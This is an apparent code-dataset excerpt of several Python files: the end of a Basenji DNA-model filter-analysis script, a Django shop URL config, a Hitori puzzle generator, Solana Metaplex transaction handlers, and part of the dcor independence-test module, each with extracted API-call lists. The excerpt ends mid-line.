rotation='horizontal') # , size=10)\n plt.savefig(out_pdf)\n plt.close()\n\n\n################################################################################\n# plot_filter_logo\n#\n# Plot a weblogo of the filter's occurrences\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef plot_filter_logo(filter_outs, filter_size, seqs, out_prefix, raw_t=0, maxpct_t=None):\n if maxpct_t:\n all_outs = np.ravel(filter_outs)\n all_outs_mean = all_outs.mean()\n all_outs_norm = all_outs - all_outs_mean\n raw_t = maxpct_t * all_outs_norm.max() + all_outs_mean\n\n left_pad = (filter_size - 1) // 2\n right_pad = filter_size - left_pad\n\n # print fasta file of positive outputs\n filter_fasta_out = open('%s.fa' % out_prefix, 'w')\n filter_count = 0\n\n for i in range(filter_outs.shape[0]):\n for j in range(filter_outs.shape[1]):\n if filter_outs[i, j] > raw_t:\n # construct kmer\n kmer = ''\n\n # determine boundaries, considering padding\n fstart = j - left_pad\n fend = fstart + filter_size\n\n # if it starts in left_pad\n if fstart < 0:\n kmer += 'N' * (-fstart)\n fstart = 0\n\n # add primary sequence\n kmer += seqs[i][fstart:fend]\n\n # if it ends in right_pad\n if fend > len(seqs[i]):\n kmer += 'N' * (fend - len(seqs[i]))\n\n # output\n print('>%d_%d' % (i, j), file=filter_fasta_out)\n print(kmer, file=filter_fasta_out)\n filter_count += 1\n\n filter_fasta_out.close()\n\n # make weblogo\n if filter_count > 0:\n weblogo_cmd = 'weblogo %s < %s.fa > %s.eps' % (weblogo_opts, out_prefix,\n out_prefix)\n subprocess.call(weblogo_cmd, shell=True)\n\n\n################################################################################\n# plot_score_density\n#\n# Plot the score density and print to the stats table.\n#\n# Input\n# param_matrix: np.array of the filter's parameter matrix\n# out_pdf:\n################################################################################\ndef plot_score_density(f_scores, out_pdf):\n sns.set(font_scale=1.3)\n plt.figure()\n sns.distplot(f_scores, kde=False)\n plt.xlabel('ReLU output')\n plt.savefig(out_pdf)\n plt.close()\n\n return f_scores.mean(), f_scores.std()\n\n\n################################################################################\n# __main__\n################################################################################\nif __name__ == '__main__':\n main()\n # pdb.runcall(main)\n"},"apis":{"kind":"list like","value":["basenji.seqnn.SeqNN","numpy.array","basenji.dna_io.read_job_params","basenji.batcher.BatcherF","seaborn.set","numpy.reshape","seaborn.distplot","matplotlib.pyplot.xlabel","basenji.batcher.Batcher","tensorflow.Session","numpy.max","matplotlib.pyplot.close","os.path.isdir","basenji.dna_io.hot1_dna","subprocess.call","os.mkdir","numpy.min","pandas.DataFrame","scipy.stats.spearmanr","matplotlib.pyplot.savefig","matplotlib.use","seaborn.clustermap","matplotlib.pyplot.gca","seaborn.heatmap","h5py.File","numpy.squeeze","numpy.log2","numpy.transpose","time.time","sklearn.preprocessing.scale","tensorflow.train.Saver","optparse.OptionParser","numpy.swapaxes","matplotlib.pyplot.figure","numpy.random.randint","numpy.ravel","numpy.percentile"],"string":"[\n \"basenji.seqnn.SeqNN\",\n \"numpy.array\",\n \"basenji.dna_io.read_job_params\",\n \"basenji.batcher.BatcherF\",\n \"seaborn.set\",\n \"numpy.reshape\",\n \"seaborn.distplot\",\n \"matplotlib.pyplot.xlabel\",\n \"basenji.batcher.Batcher\",\n \"tensorflow.Session\",\n \"numpy.max\",\n \"matplotlib.pyplot.close\",\n \"os.path.isdir\",\n \"basenji.dna_io.hot1_dna\",\n \"subprocess.call\",\n \"os.mkdir\",\n \"numpy.min\",\n \"pandas.DataFrame\",\n \"scipy.stats.spearmanr\",\n \"matplotlib.pyplot.savefig\",\n \"matplotlib.use\",\n \"seaborn.clustermap\",\n \"matplotlib.pyplot.gca\",\n \"seaborn.heatmap\",\n \"h5py.File\",\n \"numpy.squeeze\",\n \"numpy.log2\",\n \"numpy.transpose\",\n \"time.time\",\n \"sklearn.preprocessing.scale\",\n \"tensorflow.train.Saver\",\n \"optparse.OptionParser\",\n \"numpy.swapaxes\",\n \"matplotlib.pyplot.figure\",\n \"numpy.random.randint\",\n \"numpy.ravel\",\n \"numpy.percentile\"\n]"},"extract_api":{"kind":"string","value":"[((829, 850), 'matplotlib.use', 'matplotlib.use', (['\"\"\"PDF\"\"\"'], {}), \"('PDF')\\n\", (843, 850), False, 'import matplotlib\\n'), ((1670, 1689), 'optparse.OptionParser', 'OptionParser', (['usage'], {}), '(usage)\\n', (1682, 1689), False, 'from optparse import OptionParser\\n'), ((3270, 3290), 'h5py.File', 'h5py.File', (['data_file'], {}), '(data_file)\\n', (3279, 3290), False, 'import h5py\\n'), ((3793, 3828), 'basenji.dna_io.hot1_dna', 'basenji.dna_io.hot1_dna', (['test_seqs1'], {}), '(test_seqs1)\\n', (3816, 3828), False, 'import basenji\\n'), ((3945, 3988), 'basenji.dna_io.read_job_params', 'basenji.dna_io.read_job_params', (['params_file'], {}), '(params_file)\\n', (3975, 3988), False, 'import basenji\\n'), ((4195, 4206), 'time.time', 'time.time', ([], {}), '()\\n', (4204, 4206), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((4214, 4235), 'basenji.seqnn.SeqNN', 'basenji.seqnn.SeqNN', ([], {}), '()\\n', (4233, 4235), False, 'import basenji\\n'), ((5041, 5057), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\\n', (5055, 5057), True, 'import tensorflow as tf\\n'), ((7204, 7367), 'subprocess.call', 'subprocess.call', ([\"('tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\\n (options.out_dir, options.out_dir, options.meme_db))\"], {'shell': '(True)'}), \"(\\n 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\\n (options.out_dir, options.out_dir, options.meme_db), shell=True)\\n\", (7219, 7367), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((14271, 14293), 'numpy.array', 'np.array', (['filter_names'], {}), '(filter_names)\\n', (14279, 14293), True, 'import numpy as np\\n'), ((15402, 15481), 'pandas.DataFrame', 'pd.DataFrame', (['filter_target_cors'], {'index': 'filter_names_live', 'columns': 'target_names'}), '(filter_target_cors, index=filter_names_live, columns=target_names)\\n', (15414, 15481), True, 'import pandas as pd\\n'), ((15492, 15515), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\\n', (15499, 15515), True, 'import seaborn as sns\\n'), ((15518, 15530), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (15528, 15530), True, 'import matplotlib.pyplot as plt\\n'), ((15533, 15595), 'seaborn.clustermap', 'sns.clustermap', (['cor_df'], {'cmap': '\"\"\"BrBG\"\"\"', 'center': '(0)', 'figsize': '(8, 10)'}), \"(cor_df, cmap='BrBG', center=0, figsize=(8, 10))\\n\", (15547, 15595), True, 'import seaborn as sns\\n'), ((15598, 15618), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (15609, 15618), True, 'import matplotlib.pyplot as plt\\n'), ((15621, 15632), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (15630, 15632), True, 'import matplotlib.pyplot as plt\\n'), ((16225, 16250), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\\n', (16237, 16250), True, 'import numpy as np\\n'), ((16394, 16441), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\\n', (16411, 16441), True, 'import numpy as np\\n'), ((16452, 16494), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\\n', (16465, 16494), True, 'import numpy as np\\n'), ((16504, 16547), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\\n', (16517, 16547), True, 'import numpy as np\\n'), ((16551, 16574), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\\n', (16558, 16574), True, 'import seaborn as sns\\n'), ((16578, 16590), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (16588, 16590), True, 'import matplotlib.pyplot as plt\\n'), ((16593, 16726), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], row_cluster=True, col_cluster=True,\\n linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\\n', (16607, 16726), True, 'import seaborn as sns\\n'), ((16768, 16788), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (16779, 16788), True, 'import matplotlib.pyplot as plt\\n'), ((16857, 16868), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (16866, 16868), True, 'import matplotlib.pyplot as plt\\n'), ((17644, 17685), 'numpy.reshape', 'np.reshape', (['filter_outs', '(b, f, s, l / s)'], {}), '(filter_outs, (b, f, s, l / s))\\n', (17654, 17685), True, 'import numpy as np\\n'), ((17992, 18017), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\\n', (18004, 18017), True, 'import numpy as np\\n'), ((18161, 18208), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\\n', (18178, 18208), True, 'import numpy as np\\n'), ((18219, 18261), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\\n', (18232, 18261), True, 'import numpy as np\\n'), ((18271, 18314), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\\n', (18284, 18314), True, 'import numpy as np\\n'), ((18318, 18341), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\\n', (18325, 18341), True, 'import seaborn as sns\\n'), ((18409, 18421), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (18419, 18421), True, 'import matplotlib.pyplot as plt\\n'), ((18424, 18570), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'metric': 'dist', 'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], metric=dist, row_cluster=True,\\n col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\\n', (18438, 18570), True, 'import seaborn as sns\\n'), ((18618, 18638), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (18629, 18638), True, 'import matplotlib.pyplot as plt\\n'), ((18707, 18718), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (18716, 18718), True, 'import matplotlib.pyplot as plt\\n'), ((21275, 21296), 'seaborn.set', 'sns.set', ([], {'font_scale': '(2)'}), '(font_scale=2)\\n', (21282, 21296), True, 'import seaborn as sns\\n'), ((21299, 21345), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(param_matrix.shape[1], 4)'}), '(figsize=(param_matrix.shape[1], 4))\\n', (21309, 21345), True, 'import matplotlib.pyplot as plt\\n'), ((21348, 21443), 'seaborn.heatmap', 'sns.heatmap', (['param_matrix'], {'cmap': '\"\"\"PRGn\"\"\"', 'linewidths': '(0.2)', 'vmin': '(-param_range)', 'vmax': 'param_range'}), \"(param_matrix, cmap='PRGn', linewidths=0.2, vmin=-param_range,\\n vmax=param_range)\\n\", (21359, 21443), True, 'import seaborn as sns\\n'), ((21478, 21487), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\\n', (21485, 21487), True, 'import matplotlib.pyplot as plt\\n'), ((21614, 21634), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (21625, 21634), True, 'import matplotlib.pyplot as plt\\n'), ((21637, 21648), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (21646, 21648), True, 'import matplotlib.pyplot as plt\\n'), ((23772, 23795), 'seaborn.set', 'sns.set', ([], {'font_scale': '(1.3)'}), '(font_scale=1.3)\\n', (23779, 23795), True, 'import seaborn as sns\\n'), ((23798, 23810), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\\n', (23808, 23810), True, 'import matplotlib.pyplot as plt\\n'), ((23813, 23846), 'seaborn.distplot', 'sns.distplot', (['f_scores'], {'kde': '(False)'}), '(f_scores, kde=False)\\n', (23825, 23846), True, 'import seaborn as sns\\n'), ((23849, 23874), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['\"\"\"ReLU output\"\"\"'], {}), \"('ReLU output')\\n\", (23859, 23874), True, 'import matplotlib.pyplot as plt\\n'), ((23877, 23897), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\\n', (23888, 23897), True, 'import matplotlib.pyplot as plt\\n'), ((23900, 23911), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\\n', (23909, 23911), True, 'import matplotlib.pyplot as plt\\n'), ((3110, 3140), 'os.path.isdir', 'os.path.isdir', (['options.out_dir'], {}), '(options.out_dir)\\n', (3123, 3140), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((3146, 3171), 'os.mkdir', 'os.mkdir', (['options.out_dir'], {}), '(options.out_dir)\\n', (3154, 3171), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((4674, 4804), 'basenji.batcher.BatcherF', 'basenji.batcher.BatcherF', (['test_seqs1', 'test_targets', 'test_targets_imag'], {'batch_size': 'dr.batch_size', 'pool_width': \"job['target_pool']\"}), \"(test_seqs1, test_targets, test_targets_imag,\\n batch_size=dr.batch_size, pool_width=job['target_pool'])\\n\", (4698, 4804), False, 'import basenji\\n'), ((4869, 4979), 'basenji.batcher.Batcher', 'basenji.batcher.Batcher', (['test_seqs1', 'test_targets'], {'batch_size': 'dr.batch_size', 'pool_width': \"job['target_pool']\"}), \"(test_seqs1, test_targets, batch_size=dr.batch_size,\\n pool_width=job['target_pool'])\\n\", (4892, 4979), False, 'import basenji\\n'), ((5066, 5078), 'tensorflow.Session', 'tf.Session', ([], {}), '()\\n', (5076, 5078), True, 'import tensorflow as tf\\n'), ((5355, 5366), 'time.time', 'time.time', ([], {}), '()\\n', (5364, 5366), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((10067, 10084), 'numpy.transpose', 'np.transpose', (['pwm'], {}), '(pwm)\\n', (10079, 10084), True, 'import numpy as np\\n'), ((11127, 11146), 'numpy.array', 'np.array', (['pwm_freqs'], {}), '(pwm_freqs)\\n', (11135, 11146), True, 'import numpy as np\\n'), ((16161, 16193), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\\n', (16180, 16193), False, 'from sklearn import preprocessing\\n'), ((17836, 17871), 'numpy.swapaxes', 'np.swapaxes', (['filter_outs_mean', '(2)', '(1)'], {}), '(filter_outs_mean, 2, 1)\\n', (17847, 17871), True, 'import numpy as np\\n'), ((17928, 17960), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\\n', (17947, 17960), False, 'from sklearn import preprocessing\\n'), ((22080, 22101), 'numpy.ravel', 'np.ravel', (['filter_outs'], {}), '(filter_outs)\\n', (22088, 22101), True, 'import numpy as np\\n'), ((23363, 23403), 'subprocess.call', 'subprocess.call', (['weblogo_cmd'], {'shell': '(True)'}), '(weblogo_cmd, shell=True)\\n', (23378, 23403), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((5263, 5289), 'numpy.squeeze', 'np.squeeze', (['filter_weights'], {}), '(filter_weights)\\n', (5273, 5289), True, 'import numpy as np\\n'), ((8287, 8317), 'numpy.ravel', 'np.ravel', (['filter_outs[:, :, f]'], {}), '(filter_outs[:, :, f])\\n', (8295, 8317), True, 'import numpy as np\\n'), ((15289, 15350), 'scipy.stats.spearmanr', 'spearmanr', (['filter_outs_seq[:, fi]', 'seq_targets[:num_seqs, ti]'], {}), '(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])\\n', (15298, 15350), False, 'from scipy.stats import spearmanr\\n'), ((4289, 4300), 'time.time', 'time.time', ([], {}), '()\\n', (4298, 4300), False, 'import copy, os, pdb, random, shutil, subprocess, time\\n'), ((10281, 10299), 'numpy.log2', 'np.log2', (['bg_pwm[j]'], {}), '(bg_pwm[j])\\n', (10288, 10299), True, 'import numpy as np\\n'), ((10325, 10353), 'numpy.log2', 'np.log2', (['(pseudoc + pwm[i][j])'], {}), '(pseudoc + pwm[i][j])\\n', (10332, 10353), True, 'import numpy as np\\n'), ((19977, 20012), 'numpy.max', 'np.max', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\\n', (19983, 20012), True, 'import numpy as np\\n'), ((20024, 20059), 'numpy.min', 'np.min', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\\n', (20030, 20059), True, 'import numpy as np\\n'), ((20173, 20206), 'numpy.max', 'np.max', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\\n', (20179, 20206), True, 'import numpy as np\\n'), ((20209, 20242), 'numpy.min', 'np.min', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\\n', (20215, 20242), True, 'import numpy as np\\n'), ((10779, 10798), 'numpy.array', 'np.array', (['([1.0] * 4)'], {}), '([1.0] * 4)\\n', (10787, 10798), True, 'import numpy as np\\n'), ((10954, 10974), 'numpy.array', 'np.array', (['([0.25] * 4)'], {}), '([0.25] * 4)\\n', (10962, 10974), True, 'import numpy as np\\n')]"}}},{"rowIdx":782,"cells":{"code":{"kind":"string","value":"from django.urls import path\n\nfrom . import views\napp_name = \"shop\"\n\nurlpatterns = [\n path('', views.HomePage.as_view(), name=\"home-page\"),\n path('shop/', views.ProductListView.as_view(), name=\"product-list\"),\n path('shop//', views.ProductListView.as_view(), name=\"product-list\"),\n path('shop/products//', views.ProductDetailView.as_view(), name=\"product-detail\"),\n path('cart/', views.cart_view, name=\"cart\"),\n path('cart/add//', views.add_product_to_order, name=\"add-product-to-cart\"),\n path('cart/add//json/', views.add_product_to_cart_json, name=\"add-product-to-cart-json\"),\n path('checkout/', views.CheckOut.as_view(), name=\"checkout\"),\n path('checkout//', views.CheckOut.as_view(), name=\"checkout\"),\n path('payment/', views.PaymentChoice.as_view(), name=\"payment-choice\"),\n path('payment/order//', views.MomoPayment.as_view(), name=\"momo-payment\"),\n path('payment/momo//confirm/', views.ConfirmMomoPayment.as_view(), name=\"confirm-momo-payment\"),\n path('orders/', views.OrderList.as_view(), name=\"order-list\"),\n path('orders//', views.OrderDetail.as_view(), name=\"order-detail\"),\n path('orders//items//', views.OrderItemDetail.as_view(), name=\"order-item-detail\"),\n]\n"},"apis":{"kind":"list like","value":["django.urls.path"],"string":"[\n \"django.urls.path\"\n]"},"extract_api":{"kind":"string","value":"[((406, 449), 'django.urls.path', 'path', (['\"\"\"cart/\"\"\"', 'views.cart_view'], {'name': '\"\"\"cart\"\"\"'}), \"('cart/', views.cart_view, name='cart')\\n\", (410, 449), False, 'from django.urls import path\\n'), ((455, 550), 'django.urls.path', 'path', (['\"\"\"cart/add//\"\"\"', 'views.add_product_to_order'], {'name': '\"\"\"add-product-to-cart\"\"\"'}), \"('cart/add//', views.add_product_to_order, name=\\n 'add-product-to-cart')\\n\", (459, 550), False, 'from django.urls import path\\n'), ((551, 659), 'django.urls.path', 'path', (['\"\"\"cart/add//json/\"\"\"', 'views.add_product_to_cart_json'], {'name': '\"\"\"add-product-to-cart-json\"\"\"'}), \"('cart/add//json/', views.add_product_to_cart_json,\\n name='add-product-to-cart-json')\\n\", (555, 659), False, 'from django.urls import path\\n')]"}}},{"rowIdx":783,"cells":{"code":{"kind":"string","value":"from hitori_generator import Generator\nfrom argparse import ArgumentParser\n\n\ndef generate(n: int, output_file: str) -> None:\n if n < 3 or n > 8:\n print(\"It isn't valid size\")\n exit(4)\n generator = Generator(n)\n data = generator.generate()\n lines = map(lambda x: ' '.join(map(str, x)), data)\n with open(output_file, 'w', encoding='utf-8') as f:\n f.write('\\n'.join(lines))\n\n\ndef main():\n p = ArgumentParser()\n p.add_argument('filename', type=str, help='Path to output file')\n p.add_argument('-s', \"--size\", type=int, default=3, help='Generate SxS field. size must be in [3, 8]. Default is 3')\n\n args = p.parse_args()\n generate(args.size, args.filename)\n\n\nif __name__ == '__main__':\n main()\n"},"apis":{"kind":"list like","value":["hitori_generator.Generator","argparse.ArgumentParser"],"string":"[\n \"hitori_generator.Generator\",\n \"argparse.ArgumentParser\"\n]"},"extract_api":{"kind":"string","value":"[((217, 229), 'hitori_generator.Generator', 'Generator', (['n'], {}), '(n)\\n', (226, 229), False, 'from hitori_generator import Generator\\n'), ((429, 445), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\\n', (443, 445), False, 'from argparse import ArgumentParser\\n')]"}}},{"rowIdx":784,"cells":{"code":{"kind":"string","value":"from common.make_tx import make_swap_tx\nfrom sol.handle_simple import handle_unknown_detect_transfers\n\n\ndef handle_metaplex(exporter, txinfo):\n transfers_in, transfers_out, _ = txinfo.transfers_net\n\n if len(transfers_in) == 1 and len(transfers_out) == 1:\n sent_amount, sent_currency, _, _ = transfers_out[0]\n received_amount, received_currency, _, _ = transfers_in[0]\n\n row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)\n exporter.ingest_row(row)\n else:\n handle_unknown_detect_transfers(exporter, txinfo)\n\n\ndef is_nft_mint(txinfo):\n log_instructions = txinfo.log_instructions\n transfers_in, transfers_out, _ = txinfo.transfers_net\n\n if \"MintTo\" in log_instructions and len(transfers_out) == 1 and len(transfers_in) == 0:\n return True\n elif (\"MintTo\" in log_instructions\n and len(transfers_out) == 1\n and len(transfers_in) == 1\n and transfers_in[0][0] == 1):\n return True\n else:\n return False\n\n\ndef handle_nft_mint(exporter, txinfo):\n transfers_in, transfers_out, transfers_unknown = txinfo.transfers_net\n\n if len(transfers_in) == 1 and len(transfers_out) == 1:\n sent_amount, sent_currency, _, _ = transfers_out[0]\n received_amount, received_currency, _, _ = transfers_in[0]\n\n row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)\n exporter.ingest_row(row)\n return\n\n handle_unknown_detect_transfers(exporter, txinfo)\n"},"apis":{"kind":"list like","value":["common.make_tx.make_swap_tx","sol.handle_simple.handle_unknown_detect_transfers"],"string":"[\n \"common.make_tx.make_swap_tx\",\n \"sol.handle_simple.handle_unknown_detect_transfers\"\n]"},"extract_api":{"kind":"string","value":"[((1494, 1543), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\\n', (1525, 1543), False, 'from sol.handle_simple import handle_unknown_detect_transfers\\n'), ((403, 491), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\\n received_currency)\\n', (415, 491), False, 'from common.make_tx import make_swap_tx\\n'), ((539, 588), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\\n', (570, 588), False, 'from sol.handle_simple import handle_unknown_detect_transfers\\n'), ((1356, 1444), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\\n received_currency)\\n', (1368, 1444), False, 'from common.make_tx import make_swap_tx\\n')]"}}},{"rowIdx":785,"cells":{"code":{"kind":"string","value":"\"\"\"\nFunctions for testing independence of several distributions.\n\nThe functions in this module provide methods for testing if\nthe samples generated from two random vectors are independent.\n\"\"\"\nimport numpy as np\nimport scipy.stats\n\nfrom . import _dcor_internals, _hypothesis\nfrom ._dcor import u_distance_correlation_sqr\nfrom ._utils import _random_state_init, _transform_to_2d\n\n\ndef distance_covariance_test(\n x,\n y,\n *,\n num_resamples=0,\n exponent=1,\n random_state=None,\n n_jobs=1,\n):\n \"\"\"\n Test of distance covariance independence.\n\n Compute the test of independence based on the distance\n covariance, for two random vectors.\n\n The test is a permutation test where the null hypothesis is that the two\n random vectors are independent.\n\n Parameters\n ----------\n x: array_like\n First random vector. The columns correspond with the individual random\n variables while the rows are individual instances of the random vector.\n y: array_like\n Second random vector. The columns correspond with the individual random\n variables while the rows are individual instances of the random vector.\n exponent: float\n Exponent of the Euclidean distance, in the range :math:`(0, 2)`.\n Equivalently, it is twice the Hurst parameter of fractional Brownian\n motion.\n num_resamples: int\n Number of permutations resamples to take in the permutation test.\n random_state: {None, int, array_like, numpy.random.RandomState}\n Random state to generate the permutations.\n\n Returns\n -------\n HypothesisTest\n Results of the hypothesis test.\n\n See Also\n --------\n distance_covariance\n\n Examples\n --------\n >>> import numpy as np\n >>> import dcor\n >>> a = np.array([[1, 2, 3, 4],\n ... [5, 6, 7, 8],\n ... [9, 10, 11, 12],\n ... [13, 14, 15, 16]])\n >>> b = np.array([[1, 0, 0, 1],\n ... [0, 1, 1, 1],\n ... [1, 1, 1, 1],\n ... [1, 1, 0, 1]])\n >>> dcor.independence.distance_covariance_test(a, a)\n HypothesisTest(p_value=1.0, statistic=208.0)\n >>> dcor.independence.distance_covariance_test(a, b)\n ... # doctest: +ELLIPSIS\n HypothesisTest(p_value=1.0, statistic=11.75323056...)\n >>> dcor.independence.distance_covariance_test(b, b)\n HypothesisTest(p_value=1.0, statistic=1.3604610...)\n >>> dcor.independence.distance_covariance_test(a, b,\n ... num_resamples=5, random_state=0)\n HypothesisTest(p_value=0.5, statistic=11.7532305...)\n >>> dcor.independence.distance_covariance_test(a, b,\n ... num_resamples=5, random_state=13)\n HypothesisTest(p_value=0.3333333..., statistic=11.7532305...)\n >>> dcor.independence.distance_covariance_test(a, a,\n ... num_resamples=7, random_state=0)\n HypothesisTest(p_value=0.125, statistic=208.0)\n\n \"\"\"\n x = _transform_to_2d(x)\n y = _transform_to_2d(y)\n\n _dcor_internals._check_same_n_elements(x, y)\n\n random_state = _random_state_init(random_state)\n\n # Compute U-centered matrices\n u_x = _dcor_internals._distance_matrix_generic(\n x,\n centering=_dcor_internals.double_centered,\n exponent=exponent)\n u_y = _dcor_internals._distance_matrix_generic(\n y,\n centering=_dcor_internals.double_centered,\n exponent=exponent)\n\n # Use the dcov statistic\n def statistic_function(distance_matrix):\n return u_x.shape[0] * _dcor_internals.mean_product(\n distance_matrix, u_y)\n\n return _hypothesis._permutation_test_with_sym_matrix(\n u_x,\n statistic_function=statistic_function,\n num_resamples=num_resamples,\n random_state=random_state,\n n_jobs=n_jobs)\n\n\ndef partial_distance_covariance_test(\n x,\n y,\n z,\n *,\n num_resamples=0,\n exponent=1,\n random_state=None,\n n_jobs=1,\n):\n \"\"\"\n Test of partial distance covariance independence.\n\n Compute the test of independence based on the partial distance\n covariance, for two random vectors conditioned on a third.\n\n The test is a permutation test where the null hypothesis is that the first\n two random vectors are independent given the third one.\n\n Parameters\n ----------\n x: array_like\n First random vector. The columns correspond with the individual random\n variables while the rows are individual instances of the random vector.\n y: array_like\n Second random vector. The columns correspond with the individual random\n variables while the rows are individual instances of the random vector.\n z: array_like\n Observed random vector. The columns correspond with the individual\n random variables while the rows are individual instances of the random\n vector.\n num_resamples: int\n Number of permutations resamples to take in the permutation test.\n random_state: {None, int, array_like, numpy.random.RandomState}\n Random state to generate the permutations.\n\n Returns\n -------\n HypothesisTest\n Results of the hypothesis test.\n\n See Also\n --------\n partial_distance_covariance\n\n Examples\n --------\n >>> import numpy as np\n >>> import dcor\n >>> a = np.array([[1, 2, 3, 4],\n ... [5, 6, 7, 8],\n ... [9, 10, 11, 12],\n ... [13, 14, 15, 16]])\n >>> b = np.array([[1, 0, 0, 1],\n ... [0, 1, 1, 1],\n ... [1, 1, 1, 1],\n ... [1, 1, 0, 1]])\n >>> c = np.array([[1000, 0, 0, 1000],\n ... [0, 1000, 1000, 1000],\n ... [1000, 1000, 1000, 1000],\n ... [1000, 1000, 0, 1000]])\n >>> dcor.independence.partial_distance_covariance_test(a, a, b)\n ... # doctest: +ELLIPSIS\n HypothesisTest(p_value=1.0, statistic=142.6664416...)\n >>> dcor.independence.partial_distance_covariance_test(a, b, c)\n ... # doctest: +ELLIPSIS\n HypothesisTest(p_value=1.0, statistic=7.2690070...e-15)\n >>> dcor.independence.partial_distance_covariance_test(b, b, c)\n ... # doctest: +ELLIPSIS\n HypothesisTest(p_value=1.0, statistic=2.2533380...e-30)\n >>> dcor.independence.partial_distance_covariance_test(a, b, c,\n ... num_resamples=5, random_state=0)\n HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15)\n >>> dcor.independence.partial_distance_covariance_test(a, b, c,\n ... num_resamples=5, random_state=13)\n HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15)\n >>> dcor.independence.partial_distance_covariance_test(a, c, b,\n ... num_resamples=7, random_state=0)\n HypothesisTest(p_value=1.0, statistic=-7.5701764...e-12)\n\n \"\"\"\n random_state = _random_state_init(random_state)\n\n # Compute U-centered matrices\n u_x = _dcor_internals._u_distance_matrix(x, exponent=exponent)\n u_y = _dcor_internals._u_distance_matrix(y, exponent=exponent)\n u_z = _dcor_internals._u_distance_matrix(z, exponent=exponent)\n\n # Compute projections\n proj = _dcor_internals.u_complementary_projection(u_z)\n\n p_xz = 